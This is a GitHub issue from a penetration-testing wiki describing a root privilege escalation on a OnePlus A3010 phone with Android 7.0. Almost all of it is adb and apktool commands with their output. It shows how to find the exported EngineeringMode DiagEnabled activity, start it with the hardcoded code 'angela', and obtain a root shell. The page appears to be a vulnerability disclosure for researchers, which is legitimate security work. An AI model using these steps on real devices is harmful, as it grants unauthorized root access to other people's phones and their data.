search

nixawk / pentest-wiki

PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.
MIT License
3.37k stars 915 forks source link

[privilege escalation] ONEPLUS phone #23

Open nixawk opened 6 years ago

nixawk commented 6 years ago

Tested on ONEPLUS A3010

$ adb shell getprop ro.build.version.release
7.0

$ adb shell pm list packages -f
$ adb pull /system/app/EngineeringMode/ EngineeringMode.apk
$ cd EngineeringMode.apk
$ apktool -d EngineeringMode.apk
$ grep -Ri "com.android.engineeringmode" EngineeringMode/AndroidManifest.xml

        <activity android:configChanges="keyboardHidden|orientation" android:name=".qualcomm.QualCommNvShow"/>
        <activity android:configChanges="keyboardHidden|orientation" android:excludeFromRecents="true" android:name=".qualcomm.DiagEnabled" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="com.android.engineeringmode.qualcomm.DiagEnabled"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </activity>
$ adb shell am start -n com.android.engineeringmode/.qualcomm.DiagEnabled --es "code" "angela"
Starting: Intent { cmp=com.android.engineeringmode/.qualcomm.DiagEnabled (has extras) }
$ adb shell id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0